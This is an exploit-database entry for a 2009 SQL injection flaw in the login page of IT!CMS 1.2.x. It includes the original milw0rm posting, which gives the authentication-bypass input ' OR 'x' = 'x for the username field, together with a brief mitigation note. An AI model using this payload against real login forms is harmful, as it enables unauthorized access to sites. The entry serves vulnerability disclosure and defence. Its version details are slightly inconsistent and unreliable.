IT!CMS - exploit.company

vendor:

IT!CMS

by:

certaindeath

8.5

CVSS

HIGH

SQL Injection

CWE

Product Name: IT!CMS

Affected Version From: IT!CMS 1.2.0

Affected Version To: IT!CMS 1.2.1

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

IT!CMS <= vers. SQL Injection Vulnerability

IT!CMS is prone to a SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to manipulate SQL queries and gain access to unauthorized information. This issue affects versions prior to IT!CMS 1.2.1.

Mitigation:

To mitigate this issue, ensure that user-supplied data is properly sanitized before using it in an SQL query.

Source

Exploit-DB raw data:

                     __         .__            .___             __  .__     
  ____  ____________/  |______  |__| ____    __| _/____ _____ _/  |_|  |__  
_/ ___\/ __ \_  __ \   __\__  \ |  |/    \  / __ |/ __ \\__  \\   __\  |  \ 
\  \__\  ___/|  | \/|  |  / __ \|  |   |  \/ /_/ \  ___/ / __ \|  | |   Y  \
 \___  >___  >__|   |__| (____  /__|___|  /\____ |\___  >____  /__| |___|  /
     \/    \/                 \/        \/      \/    \/     \/          \/ 
--+++~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+++--
--+++~~~~~ IT!CMS <= vers. SQL Injection Vulnerability ~~~~~+++--
--+++~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+++--
[+] Discovered by: certaindeath
[+] Exploit: simple SQL injection
[+] Path: [cms dir]/login.php
[+] Username: ' OR 'x' = 'x
[+] Password: anything
[+] Have fun ^^

# milw0rm.com [2009-01-06]